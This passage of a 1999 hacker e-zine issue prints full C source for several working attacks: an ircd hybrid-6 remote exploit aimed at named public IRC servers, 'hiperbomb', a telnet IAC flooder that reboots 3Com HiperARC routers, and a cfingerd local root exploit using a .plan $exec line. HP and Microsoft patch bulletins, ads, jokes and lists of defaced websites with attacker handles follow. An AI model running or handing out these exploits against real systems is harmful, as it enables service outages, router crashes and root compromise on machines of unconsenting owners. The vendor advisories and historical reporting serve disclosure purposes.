printf("strlen(buf) = %d, strlen(shellcode) = %d\n\n",
strlen(buf), strlen(shellcode));

printf("%s\n", buf);
}


inviter:(ircdexp.c)

/*
* ircd hybrid 6 exploit (inviter side)
* Copyright (C) May 1999, Matt Conover & w00w00 Security Team
*
* When a channel is +pi with more than one op in it, it will send a
* message to all other ops in the the channel with the following format:
* INVITE: %s (%s invited %s [%s@%s])
*
* The steps to exploit this are as follows (requires 3 clients):
* 1. Client A (9chars!10chars@trivial) joins #199chars
* 2. Client B (trivial!trivial@trivial) joins #199chars
* 3. Client A sets mode #199chars +pio Client B
* 4. Client A invites Client C (9chars!10chars@58chars) to #199chars
*
* The code on the invitee's side is done separately.
*/

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define SAME 0
#define ERROR -1
#define BUFSIZE 512

#define HOSTLEN 63
#define CHANLEN 200

/* NOTE: This code is not pretty, but tracking 3 clients isn't either. */

struct servstruct {
char *server;
int port;
};

struct servstruct server[2] = {
{ "irc.arpa.com", 6667 },
{ "irc.freei.net", 6667 }
};

char nick[3][10] = {
"clientaaa",
"clientbbb",
"clientccc"
};

int sockfd[2];

char srchost[HOSTLEN+1];
char channel[CHANLEN+1];
char readbuf[BUFSIZE], writebuf[BUFSIZE];

struct sockaddr_in servsin;

/* ---------------------------------------- */

void exploit();
void checkerrors();
void makeconn(int fd, char *nick, char *host, int port);

char *inet_ntoa(struct in_addr in);

int main(int argc, char **argv)
{
register int clients;
struct hostent *hostent;

if (gethostname(srchost, HOSTLEN) == ERROR)
{
fprintf(stderr, "error with gethostname(): %s\n", strerror(errno));
fprintf(stderr, "continuing anyway.. but likely won't work\n");

strcpy(srchost, "UNKNOWN");
}

for (clients = 0; clients < 2; clients++)
{
hostent = gethostbyname(server[clients].server);
if (hostent == NULL)
{
fprintf(stderr, "gethostbyname() error (client %d): ",
clients, strerror(h_errno));

exit(ERROR);
}

servsin.sin_family = AF_INET;
servsin.sin_port = htons(server[clients].port);
memset(&servsin.sin_zero, 0, sizeof(servsin.sin_zero));
memcpy(&servsin.sin_addr, hostent->h_addr, hostent->h_length);

sockfd[clients] = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);

makeconn(sockfd[clients], nick[clients],
server[clients].server,
server[clients].port);
}

printf("Calling exploit()..\n");
exploit();

printf("All exploit work has been completed.\n");
for (clients = 0; clients < 3; clients++) close(sockfd[clients]);
return 0;
}


/* connect and login to irc server */
void makeconn(int fd, char *nick, char *host, int port)
{
register int clients;

printf("Connecting to %s (%s) [port %d] as:\n%s!%s@%s\n\n",
host, (char *)inet_ntoa(servsin.sin_addr), port, nick,
"AAAAAAAAAA", srchost);

if (connect(fd, (struct sockaddr *)&servsin,
sizeof(struct sockaddr_in)) == ERROR)
{
fprintf(stderr, "error connecting to %s: %s\n",
host, strerror(errno));

exit(ERROR);
}

memset(readbuf, 0, sizeof(readbuf));
memset(writebuf, 0, sizeof(writebuf));

snprintf(writebuf, BUFSIZE-1, "NICK %s\n", nick);

printf("Sending NICK info for %s\n", nick);
if (send(fd, writebuf, strlen(writebuf), 0) == ERROR)
{
fprintf(stderr, "error with send() (%s): %s\n",
nick, strerror(errno));

for (clients = 0; clients < 2; clients++) close(sockfd[clients]);
exit(ERROR);
}

snprintf(writebuf, BUFSIZE-1, "USER AAAAAAAAAA none none :w00w00\n");

printf("Sending USER info for %s\n", nick);
if (send(fd, writebuf, strlen(writebuf), 0) == ERROR)
{
fprintf(stderr, "error with send() (%s): %s\n",
nick, strerror(errno));

for (clients = 0; clients < 2; clients++) close(sockfd[clients]);
exit(ERROR);
}

sleep(5); /* make sure we give sockbuf enough time to fill up */

if (clients < 2)
{
channel[0] = '#';
memset(channel+1, 'A', CHANLEN-1);
channel[CHANLEN] = '\0';

memset(writebuf, 0, sizeof(writebuf));
snprintf(writebuf, BUFSIZE-1, "JOIN %s\n", channel);

printf("\n[%s] /JOIN'ing channel\n", nick);

if (send(fd, writebuf, strlen(writebuf), 0) == ERROR)
{
fprintf(stderr, "error with send() (client %d): %s\n",
clients, strerror(errno));

for (clients = 0; clients < 2; clients++) close(fd);
exit(ERROR);
}
}

printf("\n[Client %d] Checking for login errors...\n", clients);
checkerrors();
printf("[Client %d] Successfuly logged in\n\n", clients);
}


/* check for errors in login */
void checkerrors()
{
char *ptr;
int res = ERROR;
register int clients;

for (clients = 0; clients < 2; clients++)
{
while (res == sizeof(readbuf) - 1)
{
res = recv(sockfd[clients], readbuf, sizeof(readbuf)-1, 0);
if (res == ERROR)
{
fprintf(stderr, "error reading socket (client %d): %s\n",
clients, strerror(errno));

for (clients = 0; clients < 2; clients++)
close(sockfd[clients]);

exit(ERROR);
}

else
{
if (clients == 0)
{
ptr = strstr(readbuf, "hybrid-");
if ((ptr != NULL) && (strncmp(ptr, "hybrid-6", 8) != SAME))
{
fprintf(stderr, "ERROR (client %d): "
"the server must be a hybrid-6 ircd\n",
clients);

for (clients = 0; clients < 2; clients++)
close(sockfd[clients]);

exit(ERROR);
}
}

ptr = strstr(readbuf, ":ERROR");
if (ptr != NULL)
{
fprintf(stderr, "error with irc server (client %d):\n%s\n",
clients, ptr);

for (clients = 0; clients < 3; clients++)
close(sockfd[clients]);

exit(ERROR);
}
}
}
}
}

/* main part of program */
void exploit()
{
register int clients;

memset(writebuf, 0, sizeof(writebuf));
snprintf(writebuf, BUFSIZE-1, "MODE %s +ipo %s\n", channel, nick[1]);

printf("%s will now attempt to set channel modes\n", nick[0]);

/* Client A sets modes and ops Client B */
if (send(sockfd[0], writebuf, strlen(writebuf), 0) == ERROR)
{
fprintf(stderr, "error with send(): %s\n", strerror(errno));

for (clients = 0; clients < 2; clients++) close(clients[sockfd]);
exit(ERROR);
}

sleep(3), checkerrors(); /* check to see if we had a race condition */

printf("\nAttempting to invite %s (the final item)..\n", nick[2]);
memset(writebuf, 0, sizeof(writebuf));
snprintf(writebuf, BUFSIZE-1, "INVITE %s %s\n", nick[2], channel);

/* ircd ownage/crash will occur during after this send() */
if (send(sockfd[0], writebuf, strlen(writebuf), 0) == ERROR)
{
fprintf(stderr, "error with send() (client %d): %s\n",
clients, strerror(errno));

for (clients = 0; clients < 2; clients++) close(sockfd[clients]);
exit(ERROR);
}

/* should have stopped/crashed on server-side by now */
checkerrors();
}


@HWA

74.0 hiperbomb.c - reboot a hiperarc router
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Hello,


The attached program will reboot a 3com HiperARC. I made an attempt to
contact 3com before posting this report, however, I received no response.
By flooding the telnet port of a 3com HiperARC using the provided program,
the HiperARC unconditionally reboots. This program is effective over all
interfaces, including a dialup.


Regards,


Jonathan Chapman
Director of Network Security
FIRST Incorporated
jchapman@1st.net www.1st.net



hiperbomb1.c

/* ---------------------------------------------------------------------
* hiperbomb2.c - Reboots HiperARC faster.
* ---------------------------------------------------------------------
* (c) 1999 - Jonathan Chapman <jchapman@1st.net>
* ---------------------------------------------------------------------
*

  
Sends a high volume of IACs which eventually leads to a reboot of the
* HiperARC. Brief testing indicated that this problem is most likely
* specific to sending IACs rather than any other type of data. Further
* research has shown that specific IAC patterns are more likely to cause
* a reboot. In this example I use one of the most efficient combinations
* I have discovered. Through my testing it usually required at least
* 60,000 packets to cause the HiperARC to reboot.
* ---------------------------------------------------------------------
*/


#include <stdio.h>
#include <stdarg.h>
#include <fcntl.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>

char *chassis;
int sockfd, num_of_tries;

void connect_to_chassis(char *name)
{
struct hostent *host;
struct sockaddr_in remote;

host = gethostbyname(name);

if(!host) {
fprintf(stderr, "Cannot resolve host %s.\n", name);
exit(3);
}

sockfd = socket(AF_INET, SOCK_STREAM, 0);

if(sockfd < 0) {
fprintf(stderr, "Cannot obtain descriptor.\n");
exit(4);
}

remote.sin_family = AF_INET;
remote.sin_addr = *(struct in_addr *)*host->h_addr_list;
remote.sin_port = htons(23);

connect(sockfd, (struct sockaddr *)&remote, sizeof(remote));

return;
}

void send_iacs()
{
unsigned char reply[3] = {254, 36, 185};
unsigned int k;

for(k = 0; k < num_of_tries; k++) {
write(sockfd, reply, 3);
}
}

int main(int ac, char **av)
{

if(ac < 3) {
fprintf(stderr, "Syntax: %s <chassis name> <num of packets>\n", av[0]);
fprintf(stderr, "Approximately 60,000 packets usually takes care of the job.\n");
exit(2);
}

chassis = av[1];
num_of_tries = atoi(av[2]);

fprintf(stderr, "Beginning attack on chassis %s [%d packets]\n",
chassis, num_of_tries);
connect_to_chassis(chassis);
send_iacs();
fprintf(stderr, "Attack complete.\n");

exit(0);
}

@HWA

75.0 HP Security Bulletins Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~



HP Support Information Digests


===============================================================================
o HP Electronic Support Center World Wide Web Service
---------------------------------------------------


If you subscribed through the HP Electronic Support Center and would
like to be REMOVED from this mailing list, access the
HP Electronic Support Center on the World Wide Web at:


http://europe-support.external.hp.com


Login using your HP Electronic Support Center User ID and Password.
Then select Support Information Digests. You may then unsubscribe from the
appropriate digest.
===============================================================================


Digest Name: Daily Security Bulletins Digest
Created: Thu Aug 12 15:00:02 METDST 1999


Table of Contents:


Document ID Title
--------------- -----------
HPSBUX9906-098 Security Vulnerability in VVOS NES


The documents are listed below.
-------------------------------------------------------------------------------


Document ID: HPSBUX9906-098
Date Loaded: 19990811
Title: Security Vulnerability in VVOS NES


---------------------------------------------------------------------------
**REVISED01** HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00098, 10 June 99
Last Revised: 11 August 1999
---------------------------------------------------------------------------


The information in the following Security Bulletin should be acted upon
as soon as possible. Hewlett-Packard Company will not be liable for any
consequences to any customer resulting from customer's failure to fully
implement instructions in this Security Bulletin as soon as possible.


-------------------------------------------------------------------------
PROBLEM: Netscape Enterprise Server cannot correctly process some URL's.


PLATFORM: HP9000 Series 700/800 running:
HP-UX 10.24 (VVOS) with VirtualVault A.02.00
HP-UX 10.24 (VVOS) with VirtualVault A.03.00
HP-UX 10.24 (VVOS) with VirtualVault A.03.01
HP-UX 10.24 (VVOS) with VirtualVault A.03.50


DAMAGE: Web Server cannot correctly process some URLs.


SOLUTION: Apply the appropriate patches to correct the problem:
**REVISED01**
Both HP-UX 10.24 with VirtualVault A.02.00 US/Canada, and
HP-UX 10.24 with VirtualVault A.02.00 International:
PHCO_18615 libsecalarm cumulative patch
Please note this patch has dependencies.
----->> PHSS_19389 VirtualVault:2.00:NES:NSAPI


Both HP-UX 10.24 with VirtualVault A.03.00 US/Canada, and
HP-UX 10.24 with VirtualVault A.03.00 International:
PHCO_18615 libsecalarm cumulative patch
Please note this patch has dependencies.
----->> PHSS_19388 VirtualVault:3.00:NES:NSAPI


Both HP-UX 10.24 with VirtualVault A.03.01 US/Canada, and
HP-UX 10.24 with VirtualVault A.03.01 International:
PHCO_18615 libsecalarm cumulative patch
Please note this patch has dependencies.
----->> PHSS_19387 VirtualVault:3.01:NES:NSAPI


Both HP-UX 10.24 with VirtualVault A.03.50 US/Canada, and
HP-UX 10.24 with VirtualVault A.03.50 International
PHCO_18615 libsecalarm cumulative patch
Please note this patch has dependencies.
----->> PHSS_19376 VirtualVault:3.50:NES:NSAPI


AVAILABILITY: All patches are available now.
CHANGE SUMMARY: Defects in previous patches discovered.
-----------------------------------------------------------------------
I.
A. Background
A recent bugtraq posting contained some inaccurate information
regarding Hewlett-Packard Company's VirtualVault Operating System.
This problem is not TGA nor TGP related; further, VVOS does not
have a B1 or B2 level of certification.


Under certain conditions, Netscape Enterprise Server (NES)
fails to properly process web requests. This activity has
been observed in the NES bundled with Praesidium VirtualVault
releases A.02.00, A.03.00, A.03.01 and A.03.50.


B. Fixing the problem
This problem can be completely eliminated by applying the
recommended patches mentioned above. It can be resolved
temporarily by commenting out or removing the "vault-auth-log"
AddLog line from the Netscape Enterprise Server's obj.conf file.


Upon patching the system, automatic reboot is performed. The
affected filesets are: VaultNES.NES-VAULT VaultTS.INES-COMMON.


C. To subscribe to automatically receive future NEW HP Security
Bulletins or access the HP Electronic Support Center, use your
browser to get to our ESC web page at:


http://us-support.external.hp.com (for non-European locations),
or http://europe-support.external.hp.com (for Europe)


Login with your user ID and password (or register for one).
Remember to save the User ID/password assigned to you.


Once you are in the Main Menu:
To -subscribe- to future HP Security Bulletins,
click on "Support Information Digests".
To -review Security bulletins already released-,
click on the "Search Technical Knowledge Database."
To -retrieve patches-, click on "Individual Patches" and select
appropriate release and locate with the patch identifier (ID).
To -browse the HP Security Bulletin Archive-, select the link at
the bottom of the page once in the "Support Information Digests".
To -view the Security Patch Matrix-, (updated daily) which
categorizes security patches by platform/OS release, and by
bulletin topic, go to the archive (above) and follow the links.


The security patch matrix is also available via anonymous ftp:
us-ffs.external.hp.com or ~ftp/export/patches/hp-ux_patch_matrix


D. To report new security vulnerabilities, send email to


security-alert@hp.com


Please encrypt any exploit information using the security-alert
PGP key, available from your local key server, or by sending a
message with a -subject- (not body) of 'get key' (no quotes) to
security-alert@hp.com.


Permission is granted for copying and circulating this Bulletin to
Hewlett-Packard (HP) customers (or the Internet community) for the
purpose of alerting them to problems, if and only if, the Bulletin
is not edited or changed in any way, is attributed to HP, and
provided such reproduction and/or distribution is performed for
non-commercial purposes.


Any other use of this information is prohibited. HP is not liable
for any misuse of this information by any third party.
________________________________________________________________________
-----End of Document ID: HPSBUX9906-098--------------------------------

@HWA

76.0 cfingerd exploit
~~~~~~~~~~~~~~~~



Bugtraq Security Advisory
=========================


A serious bug in cfingerd before version 1.4.0 has been reported.
It is present in all versions of cfingerd from 1.2.0 up to any
version of 1.3.2. If configured accordingly this bug enables any
local user to execute random programs with root priviledges.


Although I haven't been quite verbose with development of cfingerd,
Ken Hollis (the original author) has handed maintainership over to
me a while ago. I did some development and fixed some security
related bugs, but never made an official release. This is done now.


Affected systems
----------------


All systems running a version of cfingerd beginning with version
1.2.0 and before version 1.4.0 are affected.


You are safe if you have disabled ALLOW_EXECUTION in your
cfingerd.conf file in section "internal_config", i.e. that file
contains a line "-ALLOW_EXECUTION".


This is the default configuration of this package. If you use the
default cfingerd.conf file as shipped with the distribution you are
safe. You should still upgrade.


Recommended action
------------------


1st Immediately turn off ALLOW_EXECUTION in your cfingerd.conf file.


2nd Upgrade to the most recent version of cfingerd 1.4.0 to be found
at the primary site
ftp://ftp.infodrom.north.de/pub/people/joey/cfingerd/ or
ftp://metalab.unc.edu/pub/Linux/system/network/finger/ .


Exploit
-------


The exploit is quite simple. Thanks go to Tadek Knapik
<tadek@nautilus.uwoj.krakow.pl> who has informed me.


You need to add


$exec /tmp/relinq


to your ~/.plan file. Then compile the following relinq.c file in
/tmp:


#include <stdio.h>


void main()
{
printf("Root exploit test\n");
setregid(0, 0);
setreuid(0, 0);
printf("User: %d, group: %d.\n", getuid(), getgid());
}


Checksum
--------


File: ftp://ftp.infodrom.north.de/pub/people/joey/cfingerd/cfingerd-1.4.0.tar.gz
MD5sum: dcc25e89ba1dad6497365429b1db2909


Regards,


Joey


--
Experience is something you don't get until just after you need it.



@HWA

77.0 Microsoft Advisory:Patch Available for "Terminal Server Connection Request Flooding"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



The following is a Security Bulletin from the Microsoft Product Security
Notification Service.


Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************


Microsoft Security Bulletin (MS99-028)
--------------------------------------


Patch Available for "Terminal Server Connection Request Flooding"
Vulnerability


Originally Posted: August 09, 1999


Summary
=======
Microsoft has released a patch that eliminates a vulnerability that
could pose a denial-of-service threat to Microsoft(r) Windows NT(r)
Terminal Servers. Frequently asked questions regarding this vulnerability
can be found at http://www.microsoft.com/security/bulletins/MS99-028faq.asp


Issue
=====
When a request to open a new terminal connection is received by a Terminal
Server, the server undertakes a resource-intensive series of operations to
prepare for the connection. It does this before authenticating the request.
This would allow an attacker to mount a denial of service attack by levying
a large number of bogus connection requests and consuming all memory on the
Terminal Server.


This vulnerability could be exploited remotely if connection requests are
not filtered. In extreme cases, the server could crash in the face of such
an attack; in other cases, normal processing would return when the attack
ceased. The patch works by causing the server to require authentication
before processing the connection request.


Affected Software Versions
==========================
- Microsoft Windows NT Server 4.0, Terminal Server Edition


Patch Availability
==================
- Microsoft Windows NT Server 4.0, Terminal Server Edition:
ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes
/usa/NT40tse/hotfixes-postSP4/Flood-fix/


NOTE: Line breaks have been added to the above URL for readability.


More Information
================
Please see the following references for more information related to this
issue.
- Microsoft Security Bulletin MS99-028: Frequently Asked Questions,
http://www.microsoft.com/security/bulletins/MS99-028faq.asp.
- Microsoft Knowledge Base (KB) article Q238600,
Multiple Connection Requests Promote Denial of Service Attack,
http://support.microsoft.com/support/kb/articles/q238/6/00.asp.
(Note: It may take 24 hours from the original posting of this
bulletin for the KB article to be visible.)
- Microsoft Security Advisor web site,
http://www.microsoft.com/security/default.asp.


Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Technical Support is available at
http://support.microsoft.com/support/contact/default.asp.


Acknowledgments
===============
Microsoft acknowledges the ISS X-force (http://www.iss.net) for discovering
this vulnerability and working with us to alert customers about it.


Revisions
=========
- August 09, 1999: Bulletin Created.


--------------------------------------------------------------------------


THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS"
WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER
EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS
SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR
LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE
FOREGOING LIMITATION MAY NOT APPLY.


(c) 1999 Microsoft Corporation. All rights reserved.


*******************************************************************
You have received this e-mail bulletin as a result of your registration
to the Microsoft Product Security Notification Service. You may
unsubscribe from this e-mail notification service at any time by sending
an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
The subject line and message body are not used in processing the request,
and can be anything you like.


For more information on the Microsoft Security Notification Service
please visit http://www.microsoft.com/security/services/bulletin.asp. For
security-related information about Microsoft products, please visit the
Microsoft Security Advisor web site at http://www.microsoft.com/security.

@HWA

-=----------=- -=----------=- -=----------=- -=----------=-




O
0
o
O O O
0

-=----------=- -=----------=- -=----------=- -=----------=- -=----------=-

END of main news articles content... read on for ads, humour, hacked websites etc

-=----------=- -=----------=- -=----------=- -=----------=- -=----------=-




HWA.hax0r.news





AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


*****************************************************************************
* *
* ATTRITION.ORG http://www.attrition.org *
* ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
* ATTRITION.ORG DoS Database, Crypto Archive *
* ATTRITION.ORG Sarcasm, Rudeness, and More. *
* *
*****************************************************************************


www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre

<a href="http://www.2600.com/">www.2600.com</a>
<a href="http://www.kevinmitnick.com></a>


+-----------------------------------------------------------------------------+
| SmoG Alert .. http://smog.cjb.net/ NEWS on SCIENCE |
| =================== http://smog.cjb.net/ NEWS on SECURITY |
| NEWS/NEWS/NEWS/NEWS http://smog.cjb.net/ NEWS on THE NET |
| http://smog.cjb.net/ NEWS on TECHNOLOGY |
+-----------------------------------------------------------------------------+

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
<a href="
http://www.csoft.net">One of our sponsers, visit them now</a> www.csoft.net
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *



* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *




* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
//////////////////////////////////////////////////////////////////////////////


@HWA




HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*

Send in submissions for this section please! ............

How many Windows programmers does it take to change a light bulb?

472, one to write WinGetLightBulbHandle, one to write WinQueryStatusLightBulb, one to write WinGetLightSwitchHandle..... How many managers does it take to
change a light bulb?

"
We've formed a task force to study the problem and why light bulbs burn out, and figure out what, exactly, we, as supervisors, can do to make the bulbs work
smarter, not harder." How many tech support people does it take to change a light bulb?

"
We have an exact copy of the light bulb here and it seems to be working fine.Can you tell me what kind of system you have? Okay, now exactly how dark is it?
Okay, there could be four or five things wrong - have you tried the switch? How many Microsoft technicians does it take to change a light bulb?

Three, two to hold the ladder and one to screw the bulb into the tap. How many Microsoft technicians does it take to change a light bulb?

Eight: one to work the bulb and seven to make sure that Microsoft gets $2 for every light bulb ever changed anywhere in the world. How many Microsoft engineers
does it take to change a light bulb?

None, Bill Gates will just redefine MSDarkness(TM) as the new industry standard. How many Apple employees does it take to change a light bulb?

7, one to change the bulb and six to design the T - Shirt. How many Apple programmers does it take to change a light bulb?

None, the light bulb will be obselete in six months anyway. How many testers does it take to change a light bulb?

We just noticed that it was dark, we don't actually fix the problem. How many developers does it take to change a light bulb?

"The light bulb works fine on the system in my office." How many C++ programmers does it take to change a light bulb?

"Your'e still thinking procedurally. A properly designed light bulb object would inherit a change method from a generic light bulb class, so all you'd have to do is send
a light bulb change message."

.





@HWA



SITE.1 http://sik.kuntz.org/photon/

Pho's page, good info on OS fingerprinting can be found here, page recently updated
with new scanning techniques added...check it out.




@HWA



H.W Hacked websites
~~~~~~~~~~~~~~~~

Note: The hacked site reports stay, especially with some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

* Hackers Against Racist Propaganda (See issue #7)


Haven't heard from Catharsys in a while for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...

Thursday Rumours;

contributed by Magnum 351
In the last 48 hours numerous underground sites hosted
on free internet sites like Zoom, Tripod, GeoCities,
AngelFire, and others have disappeared. It would appear
that about forty of these sites have been the victim of
anonymous emails to the administrators of these
systems. It is not known who is targeting these sites for
removal but some feel it is the work of one person who
is attempting to remove the competition.

Latest cracked pages courtesy of attrition.org



[99.08.21] NT [HiP] duno.com (members.duno.com)
[99.08.21] So [bl0w team] Small World Software (www.smallworld.com)
[99.08.21] So [mozy] Satelindo (ID)
(www.satelindo.co.id)
[99.08.20] Li [HFH] HAQ (www.haq.nu)



Hacked: http://www.nailed.com
By: doofoo
Mirror: http://www.attrition.org/mirror/attrition/com/www.nailed.com/
OS: FreeBSD

Hacked: http://sgss.com
By: DW
Mirror: http://www.attrition.org/mirror/attrition/com/sgss.com/
OS: NT

*Hacked: http://www.ucam.ac.ma
By: Level Seven
Mirror: http://www.attrition.org/mirror/attrition/ma/www.ucam.ac.ma
OS: Linux


*This is the first Web site to be defaced in the country of Morocco.


Hacked: http://www.ravencomp.ie
By: Unknown
Mirror: http://www.attrition.org/mirror/attrition/ie/www.ravencomp.ie/
OS: Irix



Hacked: http://www.ddd.hu
By: 139_r00ted
Mirror: http://www.attrition.org/mirror/attrition/hu/www.ddd.hu
OS: NT



Hacked: http://www.arodnet.com
By: Infinity
Mirror: http://www.attrition.org/mirror/attrition/com/www.arodnet.com/
OS: Solaris



Hacked: http://lanpc11.ilf.dtu.dk
By: Elfoscuro
Mirror: http://www.attrition.org/mirror/attrition/dk/lanpc11.ilf.dtu.dk/
OS: NT


#2 Lyrikal (www.lyrikal.com)
Ford Gimsa Automotriz (www.fordgimsa.com.mx)
Distribuidora Monterrey Comisionistas S.A. de C.V.
(www.dimocom.com.mx)
SubmitMaster (www.submitmaster.net)
Illinois Natural History Survey (nuclear.hazard.uiuc.edu)
God Hates Fags (www.godhatesfags.com)
Now TV (www.nowtv.com)
Symbiosis Centre for Management and Human Resource
Development (www.scmhrd.edu)
ABC Network (www.abc.com)
ActiveZone (SG) (www.activezone.com.sg)
Professor J. C. Sprott, Physics, University of Wisconsin
(sprott.physics.wisc.edu)
#2 Spartanburg County Public Libraries (www.spt.lib.sc.us)
#1 Spartanburg County Public Libraries (www.spt.lib.sc.us)
Fat Kid (www.fatkid.net)
FX Interactive (www.fxnetwork.com)
Sky Radio (www.sky-radio.com)

Last Updated: 08/19/99 at 12:15

Professor J. C. Sprott, Physics, University of Wisconsin
(sprott.physics.wisc.edu)
#2 Spartanburg County Public Libraries (www.spt.lib.sc.us)
#1 Spartanburg County Public Libraries (www.spt.lib.sc.us)
Fat Kid (www.fatkid.net)
FX Interactive (www.fxnetwork.com)
Sky Radio (www.sky-radio.com)
Pet Pro (www.pet-pro.com)
NetSouth (www.netsouth.net)
Trousers (www.trousers.org)
SOS (www.s-o-s.org)
Jailed (www.jailed.com)
Iron Dragon (www.iron-dragon.com)
Texas Community Database (www.community.tded.state.tx.us)
Association of Centers for Engineering and Automation
(www.acea.neva.ru)
Vermont Business Assistance Network (www.dca.state.vt.us)
Lebanon High School, New Hampshire (www.lebanon.k12.nh.us)

Hacked: http://www.trousers.org
By: CPW
Mirror: http://www.attrition.org/mirror/attrition/org/www.trousers.org

Hacked: http://www.riddleware.com
By: Dr Nuker of the Pakistan Hacker Club
Mirror: http://www.attrition.org/mirror/attrition/com/www.riddleware.com/
OS: Solaris

Hacked: http://pepita.ead.anl.gov/
By: GEZONDHEID
Mirror: http://www.attrition.org/mirror/attrition/gov/pepita.ead.anl.gov/




and more sites at the attrition cracked web sites mirror:

http://www.attrition.org/mirror/attrition/index.html

-------------------------------------------------------------------------

A.0 APPENDICES
_________________________________________________________________________



A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.

The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html

Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html

New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/



HWA.hax0r.news Mirror Sites around the world:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW **
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.*DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwa.hax0r.news.8m.com/
http://www.fortunecity.com/skyscraper/feature/103/


International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~

Foreign correspondants and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed



Belgium.......: http://bewoner.dma.be/cum/

Brasil........: http://www.psynet.net/ka0z

http://www.elementais.cjb.net

Canada .......: http://www.hackcanada.com

Columbia......: http://www.cascabel.8m.com

http://www.intrusos.cjb.net

Finland ........http://hackunlimited.com/

Germany ........http://www.alldas.de/
http://www.security-news.com/

Indonesia.....: http://www.k-elektronik.org/index2.html

http://members.xoom.com/neblonica/

http://hackerlink.or.id/

Netherlands...: http://security.pine.nl/

Russia........: http://www.tsu.ru/~eugene/

Singapore.....: http://www.icepoint.com

South Africa ...http://www.hackers.co.za
http://www.hack.co.za
http://www.posthuman.za.net


